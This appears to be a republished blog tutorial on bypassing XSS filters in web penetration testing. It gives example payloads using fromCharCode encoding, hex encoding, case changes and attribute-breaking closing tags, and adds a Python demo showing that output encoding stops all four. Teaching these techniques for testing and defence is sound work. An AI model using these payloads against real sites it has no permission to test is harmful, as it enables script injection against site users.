"Foreign language" advanced XSS Tutorials for WEB application Pen testing

Source: Internet
Author: User
Tags: closing tag, hex code

Original http://alihassanpenetrationtester.blogspot.com/2013/01/bypassing-xss-filters-advanced-xss.html

Hi friends, last time I explained what XSS is and how an attacker can inject a malicious script into your site. As I promised earlier, I am writing this advanced XSS tutorial for you (more articles will follow).

Sometimes website owners use XSS filters (a WAF) to protect against XSS vulnerabilities.
For example, if you put in <script>alert("Hi")</script>, the filter would escape the " (quote) character, so the script would become

<script>alert(>xss detected<)</script>

Now the script won't work. Likewise, filters use different kinds of filtering methods to protect against XSS. In this case we can use some tricks to bypass the filter. Here is what I am going to cover.

1. Bypassing MAGIC_QUOTES_GPC

magic_quotes_gpc=On is a PHP setting (configured in the php.ini file); it automatically escapes every ' (single quote), " (double quote) and \ with a backslash.
For example:
<script>alert("HI");</script> will be filtered to <script>alert(\"HI\");</script>, so the script won't work now.

This is a well-known filtering method, but we can easily bypass this filter by using ASCII character codes instead.
For example, alert("HI"); can be converted to

String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41)

So the script would become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41)</script>. In this case there is no " (double quote), ' (single quote) or \ in it, so the filter can't catch it. Yes, it'll successfully run the script.

String.fromCharCode() is a JavaScript function that converts ASCII (character code) values to characters.


How to convert to ASCII values?

There are some online sites that convert text to ASCII codes, but I suggest using the Hackbar Mozilla add-on.

After installing the Hackbar add-on, press F9. It'll open a small box above the URL bar. Click XSS -> String.fromCharCode().

Now a small window will pop up. Enter the code, for instance alert("Hi"), and click the OK button. Now we have the output.

Copy the code inside <script></script> and insert it into the vulnerable site.

For eg:

hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41)</script>


2. HEX Encoding

We can encode our whole script as hex so that it can't be filtered.
For example, <script>alert("Hi");</script> can be converted to hex as:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

Now put the code in the request to the vulnerable site.
For example:

hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

Converting to hex:
This site converts text to hex code: http://centricle.com/tools/ascii-hex/

3. Bypassing using obfuscation

Some website admins put script and alert in a restricted word list. So whenever you input these keywords, the filter removes them and gives an error message like "... is not allowed to search". This can be bypassed by changing the case of the keywords (namely obfuscation).
For example:

<ScRiPt>alert("Hi");</ScRiPt>

This bypass technique rarely works, but it is worth a try.

4. Closing Tag

Sometimes putting "> at the beginning of the code would work.

"><script>alert("Hi");</script>

This closes the quoted attribute value and the tag our input was reflected into, and then opens our script tag.
Example:

hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>
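To show why the fix is output encoding rather than input filtering, here is an added example (not part of the original post): a Python model of the four situations above, a constructed search page that reflects the query through those filters only, the same page with HTML entity encoding, and a parser check for whether a real script tag ends up in the response. The filter names, page markup and case list are constructed for this demonstration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed inputs, one per technique above, paired with the filter set each faces:
# "quotes" = magic_quotes_gpc; "keyword" = case-sensitive "<script" check on the raw query.
CASES = [
    ("fromCharCode", "<script>String.fromCharCode(97,108,101,114,116,40,34,104,105,34,41)</script>", {"quotes"}),
    ("hex", "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e", {"keyword"}),
    ("case-change", "<ScRiPt>alert(1)</ScRiPt>", {"keyword"}),
    ("closing-tag", '"><script>alert(1)</script>', {"quotes"}),
]

def magic_quotes_gpc(s):
    # PHP magic_quotes_gpc: backslash before ' " and \. An HTML parser ignores
    # the backslash, so an escaped quote still terminates an attribute value.
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")

def reflect_naive(raw, filters):
    """Page a filter-only site emits ("" if the keyword check blocked the request)."""
    if "keyword" in filters and "<script" in raw:  # inspects the still URL-encoded query
        return ""
    value = unquote(raw)  # the application URL-decodes before using the value
    if "quotes" in filters:
        value = magic_quotes_gpc(value)
    return f'<input name="q" value="{value}"><p>Results for {value}</p>'

def reflect_encoded(raw):
    """Same page with contextual output encoding instead of input filtering."""
    value = html.escape(unquote(raw), quote=True)
    return f'<input name="q" value="{value}"><p>Results for {value}</p>'

class ScriptTagFinder(HTMLParser):
    """Records whether a real <script> start tag (one a browser would run) occurs."""
    def __init__(self):
        super().__init__()
        self.found = False
    def handle_starttag(self, tag, attrs):
        self.found |= tag == "script"

def executes(page):
    finder = ScriptTagFinder()
    finder.feed(page)
    return finder.found

def run_cases():
    """Map case name -> (filter-only page runs script?, encoded page runs script?)."""
    return {name: (executes(reflect_naive(raw, f)), executes(reflect_encoded(raw)))
            for name, raw, f in CASES}
```

A keyword check that ran after URL decoding would catch the hex case, but only encoding for the output context defeats all four at once, which is why that, not a blacklist, is the fix.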


Conclusion:

From the above article it's clear that XSS filters alone are not going to protect a site from XSS attacks. If you really want to make your site more secure, ask pentesters to test your application or test it yourself.

Also, there are a lot of different filter bypassing techniques; I just covered some useful ones for you.

Disclaimer:

This article is intended for educational purposes only.
